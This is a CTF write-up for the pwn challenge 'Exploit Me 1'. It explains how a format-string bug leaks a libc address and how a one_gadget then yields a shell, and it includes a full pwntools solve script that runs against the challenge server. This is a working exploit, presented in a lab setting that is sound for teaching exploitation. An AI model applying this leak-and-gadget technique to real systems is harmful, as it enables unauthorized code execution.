[EN] Exploit Me 1

tags: `Writeup` `Pwn` `English`

Curious

Train of Thought & Solution

First, put chal into IDA

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

It can be observed that this challenge can utilize an FMT leak to obtain an address, and then utilize a One Gadget to gain shell access. Therefore, it is necessary to leak the address of the libc

Next, let's take a look at the conditions for the One Gadget

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Learn More →

If you carefully examine the asm of main, you can notice that at the end, there are xor rsi, rsi and xor rdx, rdx instructions. Therefore, the conditions for the One Gadget boil down to requiring rbp - 0x78 to be writable. Since we've already leaked the libc address, we can directly use an address from the writable segment of libc to write to rbp

Solve Script :

















from pwn import *

context.arch = 'amd64'

# r = process('./chal')
r = remote('lotuxctf.com', 10007)

r.sendlineafter(b'> ', b'%9$p')
libc = int(r.recvline().strip(), 16) - 0x029d90
info(f'libc : {hex(libc)}')

one_gadget = libc + 0xebcf8
buf = libc + 0x21af00

r.sendlineafter(b'> ', b'a' * 0x10 + flat(buf, one_gadget))

r.interactive()

[EN] Exploit Me 1

tags: Writeup Pwn English

Train of Thought & Solution

Read more

[CH] Cookie Stealer

[EN] Cookie Stealer

LoTuX CTF 投稿說明

[EN] Rev C 2

tags: `Writeup` `Pwn` `English`